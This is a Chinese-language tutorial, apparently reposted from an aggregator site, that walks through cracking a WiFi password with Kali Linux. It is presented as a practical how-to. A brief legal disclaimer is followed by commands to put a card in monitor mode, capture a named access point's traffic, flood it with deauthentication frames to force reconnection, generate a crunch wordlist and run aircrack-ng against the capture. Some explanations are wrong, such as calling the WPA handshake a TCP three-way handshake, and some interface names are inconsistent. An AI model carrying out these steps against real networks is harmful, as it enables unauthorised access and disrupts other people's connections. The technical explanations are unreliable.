使用kali linux系統進行wifi暴力破解獲取密碼

注意：私自破解他人WiFi屬于違法行為，本教程僅供學習與參考。

破解工具

破解工具：kali linux系統 ，本教程使用的裝在物理機的linux系統（虛擬機使用方法一樣）。

支持監聽模式的無線網卡，本教材使用的是某寶購買的3070L網卡。

字典文件（如果你沒有字典也沒有問題后面會教你如何使用cruncl創建密碼文件）。

暴力破解就是窮舉法，將密碼字典中每一個密碼依次去與握手包中的密碼進行匹配，直到匹配成功。能否成功破解wifi密碼取決于密碼字典本身是否包含了這個密碼。破解的時間取決于CPU的運算速度以及wifi密碼本身的復雜程度。如果WiFi密碼設得足夠復雜，即使有一個好的密碼字典，破解成功也可能要數小時甚至數天。

破解開始

使用ifconfig命令查看本機網卡名稱。

eth0是有線網卡,wlan0（物理機）和wlan1（外接）是無線網卡。

使用airmon-ng命令檢查網卡是否支持監聽模式。
網卡均可以進行監聽模式。

使用airmon-ng start wlan1命令開啟網卡監聽。
網卡更具自己選擇我這里選擇外界網卡wlan1
使用ifconfig命令查看監聽模式是否開啟

無線接口wlan0變成了wlan0mon則說明監聽模式開啟。

使用airodump-ng wlan1mon命令掃描附近wifi。
掃描后得到wifi的一些信息BSSID為MAC地址，PWR為信號強度（越小信號越強）CH為信道。按下ctrl+c進行暫停掃描。

使用命令 airodump-ng -c 5 -w /root/cap/er8 --bssid C8:3A:35:8B:EA:40 wlan1mon進行對WiFi熱點: Tenda_8BEA40 進行抓包。

在新建一個終端：輸入命令 aireplay-ng -0 5 -a C8:3A:35:8B:EA:40 wlan1mon

0為用deauth洪水攻擊WiFi設備的次數，0為無限，-0
5則攻擊5次。攻擊原理是：先讓設備掉線，設備會再自動連接，并發這個自動連接過程會進行三次握手，會發送tcp包（里面包含加密的密碼數據）

此時返回前一個終端，可看到抓到的tcp包

此時已經抓取到了包，可以打開文件夾進行查看。
7. 使用命令crunch打開字典生成軟件

在輸入crunch 10 10 012 xy>>/root/12345.txt （10 10表示制作一個10位數的密碼， 012表示密碼中包含數字012xy這些元素，/root/12345.txt表示密碼文本儲存的路徑以及名字）。

8.使用aircrack-ng -w /root/12345.txt /root/cap/er8-01.cap（ircrack-ng -w 字典路徑 握手包路徑） 進行wifi密碼破解

系統正在進行暴力破解密碼。

密碼破解成功

wifi密碼為：xxyy0011

總結

以上是生活随笔為你收集整理的教你如何暴力破解wifii密码的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。